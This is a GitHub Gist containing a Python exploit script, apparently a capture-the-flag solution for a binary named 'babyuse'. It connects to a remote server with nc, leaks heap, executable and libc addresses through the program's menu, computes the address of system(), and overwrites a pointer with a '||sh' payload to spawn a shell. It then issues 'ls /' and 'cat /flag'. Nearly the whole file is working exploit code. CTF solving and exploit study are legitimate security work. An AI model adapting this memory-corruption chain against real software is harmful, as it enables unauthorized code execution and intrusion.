Created
April 17, 2017 09:07
-
-
Save autotaker/bbc00350a0919027da07c8846de3515c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
import struct | |
import time | |
from secret import TOKEN | |
remote = True | |
if remote: | |
cmd = 'nc 202.112.51.247 3456' | |
else: | |
cmd = './babyuse' | |
p = subprocess.Popen(cmd, | |
stdin=subprocess.PIPE, | |
stdout=subprocess.PIPE, | |
shell=True) | |
def send(s): | |
print("SEND: %s" % repr(s)) | |
p.stdin.write(s) | |
p.stdin.flush() | |
def recv(): | |
s = p.stdout.readline() | |
print("RECV: %s" % repr(s)) | |
return s | |
def unpack(s): | |
return struct.unpack('<I', s)[0] | |
def pack(x): | |
return struct.pack('<I', x) | |
def echo(s): | |
send(s + b'\n') | |
def leak_heap(): | |
echo(b"1") | |
echo(b"1") | |
echo(b"30") | |
echo(b"hog") | |
echo(b"1") | |
echo(b"1") | |
echo(b"15") | |
echo(b"01234") | |
echo(b"2") | |
echo(b"1") | |
echo(b"6") | |
echo(b"0") | |
echo(b"6") | |
echo(b"1") | |
echo(b"5") | |
echo(b"4") | |
while True: | |
s = recv() | |
if b'Select gun' in s: | |
addr = s.split(b' ')[2][:4] | |
assert(len(addr) >= 4) | |
addr = unpack(addr) | |
print("%x" % addr) | |
break | |
while b'7. Exit' in recv(): | |
pass | |
return addr | |
def leak_exe(heap_offset): | |
echo(b"1") | |
echo(b"1") | |
echo(b"15") | |
echo(b"01234") | |
echo(b"1") | |
echo(b"1") | |
echo(b"15") | |
echo(b"01234") | |
echo(b"6") | |
echo(b"1") | |
echo(b"4") | |
echo(b"0") | |
echo(b"15") | |
addr = 0x5655ea50 + heap_offset | |
echo(b'AAAA' + pack(addr) ) | |
echo(b'5') # this leaks binary_base + 0x1d30 | |
echo(b'4') | |
while True: | |
s = recv() | |
if b'Select gun' in s: | |
addr = s.split(b' ')[2][:4] | |
assert(len(addr) >= 4) | |
addr = unpack(addr) | |
print("%x" % addr) | |
break | |
while b'7. Exit' in recv(): | |
pass | |
return addr | |
def leak_libc(exe_base): | |
echo(b"1") | |
echo(b"1") | |
echo(b"15") | |
echo(b"01234") | |
echo(b"6") | |
echo(b"1") | |
echo(b"4") | |
echo(b"0") | |
echo(b"15") | |
echo(b"AAAA" + pack(0x3fd0 + exe_base)) | |
echo(b'5') # this leaks free@libc | |
echo(b'4') | |
while True: | |
s = recv() | |
if b'Select gun' in s: | |
addr = s.split(b' ')[2][:4] | |
assert(len(addr) >= 4) | |
addr = unpack(addr) | |
print("%x" % addr) | |
break | |
while b'7. Exit' in recv(): | |
pass | |
return addr | |
def shell(heap_offset, system_libc): | |
echo(b"1") | |
echo(b"1") | |
echo(b"15") | |
echo(b"01234") | |
echo(b"1") | |
echo(b"1") | |
echo(b"15") | |
echo(pack(system_libc)) | |
echo(b"6") | |
echo(b"1") | |
echo(b"4") | |
echo(b"0") | |
echo(b"15") | |
addr = heap_offset + 0x5655eab0 | |
print("addr = %x"% addr) | |
echo(pack(addr)*2 + b'||sh') | |
echo(b'5') | |
echo(b'1') | |
for _ in range(80): | |
s = recv() | |
if b'Select gun' in s: | |
break | |
time.sleep(1) | |
echo(b'pwd') | |
echo(b'ls /') | |
echo(b'cat /flag') | |
echo(b'exit') | |
echo(b'4') | |
echo(b'7') | |
while len(recv()) >0: | |
pass | |
if remote: | |
echo(TOKEN) | |
heap_gdb = 0x5655ea08 | |
if remote: | |
free_relative = 0x000712f0 | |
system_relative = 0x0003ada0 | |
else: | |
free_relative = 0x705b0 | |
system_relative = 0x3a940 | |
heap_current = leak_heap() | |
heap_offset = heap_current - heap_gdb | |
print("offset = %x" % heap_offset) | |
exe_current = leak_exe(heap_offset) | |
exe_base = exe_current - 0x1d30 | |
print("exe_base = %s", exe_base) | |
free_libc = leak_libc(exe_base) | |
system_libc = free_libc + system_relative - free_relative | |
print("system_libc = %x"% system_libc) | |
shell(heap_offset, system_libc) | |
p.kill() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment